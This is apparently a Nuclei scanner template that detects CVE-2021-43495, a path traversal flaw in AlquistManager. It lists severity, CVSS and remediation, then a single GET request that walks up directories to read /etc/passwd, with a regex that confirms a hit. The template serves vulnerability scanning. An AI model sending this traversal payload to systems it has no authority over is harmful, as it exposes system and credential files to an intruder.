39 lines
1.5 KiB
YAML
39 lines
1.5 KiB
YAML
id: CVE-2021-43495
|
|
|
|
info:
|
|
name: AlquistManager Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
|
|
remediation: |
|
|
Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
|
|
reference:
|
|
- https://github.com/AlquistManager/alquist/issues/43
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-43495
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03503
|
|
epss-percentile: 0.90533
|
|
cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: alquistai
|
|
product: alquist
|
|
tags: cve,cve2021,lfi,alquist,alquistai
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/asd/../../../../../../../../etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a00473045022100f4f6dd1f046bc77bec8649e0e307c8c87734ecdbb3d86515695f9b08e7a66c6002201d2d1ecd18971bfad04e7522baf4ef410b31da379f3c573140d0a91e2673a11e:922c64590222798bb761d5b6d8e72950 |